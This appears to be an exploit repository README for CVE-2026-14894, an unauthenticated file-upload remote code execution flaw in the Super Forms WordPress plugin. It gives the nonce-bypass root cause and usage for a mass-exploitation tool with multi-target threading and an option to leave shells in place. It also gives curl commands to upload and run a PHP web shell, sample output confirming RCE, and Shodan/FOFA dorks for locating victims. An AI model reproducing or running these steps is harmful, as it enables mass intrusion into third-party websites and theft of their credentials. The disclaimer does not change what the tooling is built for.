Share
## https://sploitus.com/exploit?id=4C23137B-317F-58A9-9B40-36E3F53FF075
CVE-2026-14894 โ Super Forms Unauthenticated File Upload RCE
Nonce Leak โ datauristring Upload โ Code Execution
---
## Overview
**CVE-2026-14894** is a critical-severity (CVSS 9.8) **unauthenticated** arbitrary file upload vulnerability in the **Super Forms โ Drag & Drop Form Builder** WordPress plugin (by WebRehab) versions **โค 6.3.313**.
The `super_submit_form` nopriv AJAX handler accepts file uploads via form submissions without:
1. Verifying the user is authenticated
2. Validating the file type or extension
3. Checking the MIME content against magic bytes
The nonce barrier is trivially bypassed โ a separate nopriv AJAX handler (`super_create_nonce`) generates valid nonces for any unauthenticated visitor.
Attackers upload **arbitrary PHP files** via Base64-encoded `datauristring` payloads that are written directly to `/wp-content/uploads/superforms/` with the attacker-controlled filename โ resulting in direct code execution.
### Affected Versions
| Version | Status |
|---|---|
| โค 6.3.313 | Vulnerable |
| 6.3.314+ | Patched |
> **Active installs:** 600,000+
> **Discovered by:** andrea bocchetti via Wordfence (July 7, 2026)
---
## Vulnerability Mechanism
### Root Cause
Three missing security checks in Super Forms' AJAX file upload handler:
```php
// Vulnerable: nopriv AJAX โ no auth, no file type validation, no MIME check
add_action('wp_ajax_nopriv_super_create_nonce', 'super_create_nonce'); // nonce for anyone
add_action('wp_ajax_nopriv_super_submit_form', 'super_submit_form'); // upload for anyone
function super_submit_form() {
$data = json_decode(stripslashes($_POST['data']), true);
$file = $data['sf_upload_field']['files'][0];
$content = base64_decode($file['datauristring']); // no MIME validation
$name = $file['value']; // no filename sanitization
fwrite(fopen($upload_path . $name, 'w'), $content); // PHP written to disk
}
```
### Nonce Bypass
```php
// Anyone can get a valid nonce โ no authentication required
function super_create_nonce() {
$nonce = md5(uniqid(rand(), true));
$_SESSION['sf_nonce'] = $nonce;
echo $nonce; // returned to unauthenticated attacker
}
```
### Attack Flow
```
1. POST /wp-admin/admin-ajax.php?action=super_create_nonce
โ Get valid nonce (no auth needed)
2. POST /wp-admin/admin-ajax.php?action=super_submit_form
sf_nonce=NONCE&form_id=1&data={"sf_upload_field":{"files":[{
"datauristring":"data:image/png;base64,PD9waHAgc3lzdGVt...",
"value":"shell.php"}]}}
โ Shell written to /wp-content/uploads/superforms/
3. GET /wp-content/uploads/superforms/shell.php?c=id
โ RCE confirmed
```
---
## Installation
```bash
git clone https://github.com/shinthink/CVE-2026-14894.git
cd CVE-2026-14894
pip install -r requirements.txt
```
---
## Usage
```bash
# Single target
python cve_2026_14894.py -t target.com
# Mass exploit
python cve_2026_14894.py -f targets.txt
# Mass exploit + save results
python cve_2026_14894.py -f targets.txt -o shells.txt
# Leave shells on target
python cve_2026_14894.py -t target.com --no-cleanup
# Debug mode (show every request)
python cve_2026_14894.py -t target.com --debug
```
### Arguments
```
-t, --target Single target (domain or IP)
-f, --file Target list, one per line
-o, --output Save RCE results to file
--threads Concurrent workers (default: 30)
--no-cleanup Leave shells on target
--debug Show every HTTP request + stage in real-time
-v, --verbose Show detailed output
```
---
## Proof of Concept
### Single Target
```bash
$ python cve_2026_14894.py -t target.com --debug
```
```
Super Forms | CVE-2026-14894 | CVSS 9.8
[target.com] [+] Super Forms detected v6.3.312
[target.com] [*] Nonce obtained
[target.com] [*] Uploading shell...
[target.com] [!] RCE confirmed
Host : target.com
SuperForms : YES v6.3.312
Upload : YES
RCE : YES
Shell : https://target.com/wp-content/uploads/superforms/think_abc.php?t=TOKEN
Output : uid=33(www-data) gid=33(www-data)
Time : 2.1s
```
### Mass Scan
```
Targets: 2500 | Threads: 30
[RCE] target-vuln-01.com 2.1s v6.3.312
[UP] target-patched-02.com 1.8s v6.3.314 (upload blocked)
[!] target-no-plugin-03.com 0.5s not installed
[150/2500] 6% | SuperForms:47 Upload:18 RCE:12
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Done | 180s | Targets:2500 Det:47 Upload:18 RCE:12
```
### Manual Exploitation
**Step 1 โ Obtain nonce**
```bash
curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
-d 'action=super_create_nonce'
# Returns 96-char hex nonce
```
**Step 2 โ Upload PHP shell**
```bash
NONCE="abc123..."
SHELL_B64=$(echo '' | base64 -w0)
curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
-d 'action=super_submit_form' \
-d "sf_nonce=$NONCE" \
-d 'form_id=1' \
-d 'data={"sf_upload_field":{"type":"files","files":[{"datauristring":"data:image/png;base64,'$SHELL_B64'","value":"shell.php","name":"shell.php","label":"attachment"}]}}'
```
**Step 3 โ Execute commands**
```bash
curl -sk 'https://target.com/wp-content/uploads/superforms/shell.php?c=id'
```
---
## FOFA Dork
```
body="wp-content/plugins/super-forms"
```
## Shodan
```
http.html:"super-forms"
```
---
## Impact
Successful exploitation yields **remote code execution as the web server user**. From there:
- Extract `wp-config.php` โ database credentials
- Access all WordPress content, users, and plugin data
- Deploy persistent backdoors
- Pivot to internal networks
---
## Disclaimer
> **FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.**
>
> This software is intended for security professionals conducting authorized penetration tests, organizations auditing their own infrastructure, and researchers studying vulnerability exploitation.
>
> Unauthorized access to computer systems is illegal and may violate:
> - United States: Computer Fraud and Abuse Act (18 U.S.C. 1030)
> - Indonesia: UU ITE Pasal 30 & 46
> - European Union: Directive 2013/40/EU
> - United Kingdom: Computer Misuse Act 1990
>
> The authors assume no liability for misuse.
---
## References
| Resource | Link |
|---|---|
| Wordfence Advisory | [wordfence.com](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/super-forms/super-forms-63313-unauthenticated-arbitrary-file-upload-via-data-parameter-datauristring-value) |
| IONIX Advisory | [ionix.io](https://www.ionix.io/threat-center/cve-2026-14894/) |
| NVD Entry | [CVE-2026-14894](https://nvd.nist.gov/vuln/detail/CVE-2026-14894) |
| Researcher | andrea bocchetti |
---
This project is not affiliated with WebRehab or Super Forms.